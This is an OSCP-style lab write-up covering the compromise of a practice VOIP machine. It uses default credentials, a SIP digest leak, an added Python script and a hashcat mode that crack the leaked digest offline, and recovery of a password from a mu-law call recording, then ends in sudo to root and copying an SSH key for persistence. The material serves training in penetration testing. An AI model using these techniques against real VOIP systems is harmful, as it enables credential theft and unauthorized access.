
OSCP Prep Machine 005

Tags: OSCP, VOIP, SIP, Audio Analysis, Hash Cracking

This machine was rated intermediate by OffSec and very hard by the community. I found it quite difficult due to unfamiliarity with VOIP services, but it was one of my favorite machines and a fantastic learning experience.

Enumeration

Service enumeration was performed using a custom bash script tuned for OSCP labs: rustscan for fast port discovery, followed by targeted nmap scans of the ports it finds. This pass covered TCP only, so the SIP service on 5060/UDP that the rest of the attack depends on does not appear below; on any host that looks like a VOIP system, a UDP scan of at least port 5060 (nmap -sU -p 5060) is worth the extra time.

Port Scans:

Open 192.168.96.156:22
Open 192.168.96.156:80
Open 192.168.96.156:8000

WhatWeb Results:

http://192.168.96.156 [302 Found] Apache[2.4.41], Cookies[PHPSESSID]
http://192.168.96.156/login.php [200 OK] Title[VOIP Manager]
[Screenshot: VOIP Login]

The web server on port 8000 featured a login page. Default credentials admin:admin granted entry to a VOIP system interface.

[Screenshot: VOIP Portal]

VOIP SIP Digest Leak

After researching VOIP penetration testing, I discovered the sippts toolset. SIPDigestLeak.py implements the SIP digest leak: it calls the target extension and, when the endpoint sends a request of its own during the call (typically the BYE at hang-up), answers with an authentication challenge, so the endpoint replies with a Digest header built from its configured password:

[+] Target: 192.168.96.156:5060/UDP
[=>] Request INVITE
[<=] Response 180 Ringing
[<=] Response 200 OK

Auth=Digest username="adm_sip", uri="sip:127.0.0.1:5060",
password="074b62fb6c21b84e6b5846e6bb001f67", algorithm=MD5
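The Digest header above is the whole attack surface: the response is an MD5 over the password and the challenge parameters, and everything except the password is visible on the wire, so each guess can be verified offline. The following is an added example (not code from this write-up or from sippts) that builds such a leaked header and runs a dictionary attack against it. The username adm_sip and the URI sip:127.0.0.1:5060 are the ones from the leak; the realm, nonce, method, the endpoint's password and the wordlist are constructed for the demo.

```python
"""SIP digest leak, worked through offline.

Added example, not code from the write-up or from sippts. Realm, nonce, method,
the endpoint's password and the wordlist are constructed (assumed) values.
"""
import hashlib
from typing import Optional


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def sip_digest_response(username: str, realm: str, password: str,
                        method: str, uri: str, nonce: str) -> str:
    """RFC 2617 digest response without qop, as SIP endpoints send it:
    HA1 = MD5(user:realm:password), HA2 = MD5(method:uri),
    response = MD5(HA1:nonce:HA2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def endpoint_answers_challenge(password: str, username: str, realm: str,
                               method: str, uri: str, nonce: str) -> dict:
    """What the target endpoint sends back after our 401/407 challenge.
    Every field except the password travels in the clear."""
    return {
        "username": username, "realm": realm, "nonce": nonce,
        "uri": uri, "method": method,
        "response": sip_digest_response(username, realm, password,
                                        method, uri, nonce),
    }


def crack_sip_digest(leak: dict, wordlist) -> Optional[str]:
    """Dictionary attack on the leaked response: recompute the digest for each
    candidate with the captured realm, nonce, method and URI."""
    for candidate in wordlist:
        guess = sip_digest_response(leak["username"], leak["realm"], candidate,
                                    leak["method"], leak["uri"], leak["nonce"])
        if guess == leak["response"]:
            return candidate
    return None


# Constructed challenge parameters (assumed, not from the write-up).
USERNAME = "adm_sip"
URI = "sip:127.0.0.1:5060"
REALM = "asterisk"
NONCE = "4f2a9c1e5d3b"
METHOD = "BYE"                    # the request the endpoint sends at hang-up
ENDPOINT_PASSWORD = "Summer2023!"  # what the endpoint has configured
WORDLIST = ["password", "voip123", "admin", "Summer2023!", "s3cret"]


def demo() -> Optional[str]:
    leak = endpoint_answers_challenge(ENDPOINT_PASSWORD, USERNAME, REALM,
                                      METHOD, URI, NONCE)
    return crack_sip_digest(leak, WORDLIST)


if __name__ == "__main__":
    print("recovered password:", demo())
```

The same computation is what hashcat's SIP digest mode (-m 11400) performs at scale; it needs the username, realm, nonce, method and URI from the captured exchange alongside the response, which is why the whole header, not just the 32-hex value, should be saved from the tool output.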

Foothold

The 32-hex value in the Digest header is not the password but an MD5 digest response computed over the password and the challenge, so it has to be cracked offline. Using hashcat (its SIP digest mode, -m 11400, takes the response together with the username, realm, nonce, method and URI from the exchange), I recovered the adm_sip password and used those credentials to log into the VOIP Manager service on port 80.

[Screenshot: VOIP Admin Panel]

The web app offered downloadable call recordings. Most were corrupted, but one was intact; the challenge was that it was a headerless raw audio file, so it had to be decoded with the right sample parameters before it would play.

[Screenshot: Stream Metadata]

RAW Audio Conversion with sox

Using the metadata from the Stream Rates tab:

encoder: Lavf58.29.100
Stream #0:0: Audio: pcm_mulaw, 8000 Hz, mono, s16, 64 kb/s

Converting with parameters matching the metadata (8000 Hz, mono, 8-bit samples):

sox -r 8000 -e unsigned -b 8 -c 1 2138.raw test2.raw

One caveat: pcm_mulaw is G.711 mu-law, a companded 8-bit format, not linear unsigned PCM, so the sox encoding that exactly matches the metadata is mu-law (sox accepts -e mu-law; ffmpeg's equivalent input format is -f mulaw). Decoding the bytes as unsigned linear PCM, as above, still produced intelligible speech here, but expect distortion if the recording is noisier.

The audio revealed: "Your password has been changed to [redacted]"
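To make the decoding rule visible rather than hidden behind a sox flag, here is an added example (not code from the write-up) that expands raw G.711 mu-law bytes, the format ffmpeg labels pcm_mulaw, into a 16-bit PCM WAV file in Python. The encoder is included only to construct a test tone so the script runs offline; the file name 2138.raw is the one from this write-up.

```python
"""Decode raw G.711 mu-law (ffmpeg: pcm_mulaw) into a 16-bit mono WAV.

Added example, not code from the write-up. It does in Python what
`sox -r 8000 -e mu-law -b 8 -c 1 2138.raw out.wav` does, so the companding
rule is explicit. The test tone below is constructed input.
"""
import io
import math
import struct
import sys
import wave

BIAS = 0x84   # G.711 mu-law bias added before segment coding
CLIP = 32635  # largest magnitude the 8-bit code can represent


def ulaw_encode(sample: int) -> int:
    """Compress one signed 16-bit sample to a mu-law byte (used here only to
    build test input; a real capture already consists of these bytes)."""
    sign = 0x80 if sample < 0 else 0
    magnitude = min(abs(sample), CLIP) + BIAS
    exponent = (magnitude >> 7).bit_length() - 1          # segment 0..7
    mantissa = (magnitude >> (exponent + 3)) & 0x0F       # 4-bit step inside it
    return ~(sign | (exponent << 4) | mantissa) & 0xFF    # G.711 stores the byte inverted


def ulaw_decode(byte: int) -> int:
    """Expand one mu-law byte to a signed 16-bit sample."""
    u = ~byte & 0xFF
    t = ((u & 0x0F) << 3) + BIAS
    t <<= (u & 0x70) >> 4
    return BIAS - t if u & 0x80 else t - BIAS


def ulaw_raw_to_wav(raw: bytes, rate: int = 8000) -> bytes:
    """Decode every byte and wrap the samples in a mono 16-bit WAV container."""
    pcm = struct.pack("<%dh" % len(raw), *(ulaw_decode(b) for b in raw))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(pcm)
    return buf.getvalue()


def wav_info(data: bytes) -> tuple:
    """(channels, sample width in bytes, rate, frames) of a WAV blob."""
    with wave.open(io.BytesIO(data), "rb") as w:
        return (w.getnchannels(), w.getsampwidth(), w.getframerate(), w.getnframes())


def make_test_tone(freq: float = 440.0, rate: int = 8000, n: int = 400) -> list:
    """Constructed 16-bit sine tone standing in for a real call recording."""
    return [int(20000 * math.sin(2 * math.pi * freq * i / rate)) for i in range(n)]


def round_trip_max_error(samples: list) -> int:
    """Largest |original - decode(encode(original))|. mu-law is lossy: the error
    is bounded by half a quantisation step (512 in the loudest segment), not zero."""
    encoded = bytes(ulaw_encode(s) for s in samples)
    decoded = [ulaw_decode(b) for b in encoded]
    return max(abs(a - b) for a, b in zip(samples, decoded))


if __name__ == "__main__":
    # usage: python3 ulaw2wav.py 2138.raw out.wav
    src, dst = (sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else ("2138.raw", "out.wav")
    with open(src, "rb") as f, open(dst, "wb") as g:
        g.write(ulaw_raw_to_wav(f.read()))
```

Because the byte is stored inverted and the magnitude is logarithmic, reading the same bytes as unsigned linear PCM maps loud and quiet samples to the wrong amplitudes, which is the distortion you hear when the encoding flag is wrong; the speech survives, but a proper mu-law decode is what the metadata asked for.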

Trying the discovered password against the user IDs listed in the portal's information tab gave a working SSH login.

Privilege Escalation

$ sudo -l
User may run the following commands:
    (ALL : ALL) ALL

$ sudo su
root@###P:/# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root

Persistence

After gaining root access, persistence was obtained by copying the SSH RSA private key, which allows key-based logins later without depending on the changed password.

Recap

This machine was my first experience using VOIP-specific tools and was an amazing learning experience. The attack pathway required working with VOIP protocols and audio processing - something entirely new to me.